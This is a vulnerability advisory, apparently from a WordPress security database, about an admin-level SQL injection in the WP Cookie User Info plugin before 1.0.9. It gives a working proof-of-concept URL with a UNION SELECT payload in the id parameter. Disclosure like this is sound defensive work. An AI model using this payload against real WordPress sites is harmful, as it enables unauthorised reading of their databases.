WordPress Plugin Vulnerabilities
WP Cookie User Info < 1.0.9 - Admin+ SQL Injection
Description
The plugin does not sanitise or escape the id GET parameter before using it in a SQL statement, when retrieving the setting to edit in the admin dashboard, leading to an authenticated SQL Injection
Proof of Concept
https://example.com/wp-admin/admin.php?page=wpcui-manage-settings&action=edit&id=-7418+UNION+ALL+SELECT+NULL%2Ccurrent_user()%2Ccurrent_user()%2CNULL%2CNULL%2CNULL
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-27 (about 2 years ago)
Added
2021-12-27 (about 2 years ago)
Last Updated
2022-04-16 (about 2 years ago)